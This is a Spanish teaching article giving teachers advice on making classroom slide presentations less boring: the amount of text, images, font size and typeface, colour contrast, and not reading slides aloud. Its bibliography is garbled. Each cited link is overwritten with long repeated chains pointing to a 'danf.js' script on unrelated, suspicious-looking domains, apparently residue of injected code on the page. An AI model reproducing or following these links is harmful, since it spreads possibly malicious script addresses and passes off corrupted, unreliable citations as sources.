¿PRODUCEN ABURRIMIENTO NUESTRAS PRESENTACIONES EN EL AULA?

Autora: Rocío Caballero Morenas

Cada vez son más los medios informáticos y digitales utilizados en nuestro día a día, y como no puede ser menos, utilizados en las aulas. Una de las herramientas más utilizada es la pizarra digital, que muchos profesores utilizan para exponer los temas en sus clases mediante presentaciones power-point, pero ¿sabemos los profesores cuáles son las claves de elaboración y exposición de una presentación para no aburrir a los alumnos?

Podemos decir que toda presentación se compone de dos partes esenciales. Una de ellas es la realización de las diapositivas y la otra la exposición que el profesor realiza sobre  el tema a tratar. Ambas cuentan con aspectos importantes que debemos analizar para alcanzar el éxito con nuestras presentaciones.

ELABORACIÓN DE DIAPOSITIVAS

Comenzaremos hablando de la cantidad de texto que debemos colocar en cada diapositiva. En un principio, primaba una  regla conocida como 6-6-1, que consiste en escribir 6 frases por diapositiva, con 6 palabras por frase y 1 sola idea. Pero en la actualidad, la mayoría de los autores se decantan por la idea de escribir una sola palabra o frase en cada diapositiva, que sea clave y que resuma lo que queremos explicar. Esto evita que los alumnos tengan que leer mucho texto y ayuda a que se queden con la idea clave y atiendan al resto de nuestras explicaciones.

Otro aspecto importante a tratar es la cantidad de imágenes colocadas en cada diapositiva. Se recomienda no colocar más de las que sean necesarias o explicativas; ya que el exceso de imágenes distrae al alumno del tema principal. Además, también es recomendable no poner imágenes como fondo de las diapositivas porque dificultan la lectura del texto.

Y no podemos hablar de una buena presentación y pasar por alto el tamaño y el tipo de letra a utilizar. Es imprescindible asegurarnos de que la presentación es legible desde el fondo del aula, porque sino los alumnos se quejarán y además dejaran de prestar atención porque son capaces de leer el texto. Para evitar esto, debemos de utilizar tamaños de letra lo suficientemente grandes como para ser leídos por todos.

En cuanto al tipo de letra, se recomienda el uso de un tipo sencillo, tal como Arial o Helvética, evitando utilizar tipos de letras con muchos trazos y exceso de curvas e incluso la letra en cursiva; porque pueden difuminarse en el espacio y provocar dificultad en la lectura; lo que nos llevaría de nuevo a la distracción de los alumnos por no poder leer el texto.

Otro aspecto importante para obtener una buena diapositiva es la combinación de colores utilizados; ya que podemos tener muy buen diseño de la diapositiva, pero si el contraste de colores elegido no nos permite leerla bien, estaremos estropeándola. La mayoría de los expertos recomiendan utilizar colores fríos (azul, verde, morado…) para el fondo de la diapositiva, y los colores cálidos (rojo, amarillo, naranja,…) para el texto.

EXPOSICIÓN EN CLASE

A la hora de realizar las exposiciones o explicaciones, cada profesor tiene sus costumbres, trucos o manías, pero una regla básica a la hora de exponer las presentaciones es no leer las diapositivas. Al leerlas estamos produciendo aburrimiento y disminución de atención en los alumnos. Con este acto de lectura también transmitimos inseguridad; ya que da la impresión de que no dominamos el tema. Y si además hablamos en voz baja y monótona, ya podemos proporcionarles directamente una almohada a los alumnos, que seguro nos lo agradecerían.

Ellos necesitan que transmitamos seguridad en nuestras palabras; así como que las clases sean dinámicas y participativas. Se trata de captar su atención de la mejor manera posible y de que aprendan en un entorno agradable. Que las clases les supongan una motivación y no una obligación.

Por otra parte, debemos mantenernos de cara a los alumnos el mayor tiempo posible. Es recomendable no sacar de nuestro campo de visión a parte o a la totalidad de los alumnos durante mucho tiempo; ya que muchos de ellos se percatan y aprovechan para distraerse de las explicaciones o desatender las tareas encomendadas.

CONCLUSIÓN

La mayoría de los profesores sabemos elaborar presentaciones, pero la cuestión es si es suficiente con una presentación cualquiera o hay que esforzarse por hacer una buena presentación.

Si queremos que nuestras presentaciones produzcan motivación a los alumnos, les faciliten el seguimiento de nuestras explicaciones y nuestras clases, pasen de ser un aburrimiento a ser una ayuda en la adquisición de conocimientos para ellos; podemos utilizar todas estos “consejillos”, que a buen seguro mejorarán el estilo y la efectividad de nuestras presentaciones.

BIBLIOGRAFÍA

http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&es.project-presentation.com/blog/

http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.garrreynolds.com/Presentation/slides.html

http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&carloscaicedo.net/usabilidad/una-diapositiva-no-es-un-documento-de-texto

http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&sirfreakthemighty.wikidot.com/tips:presentacion

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.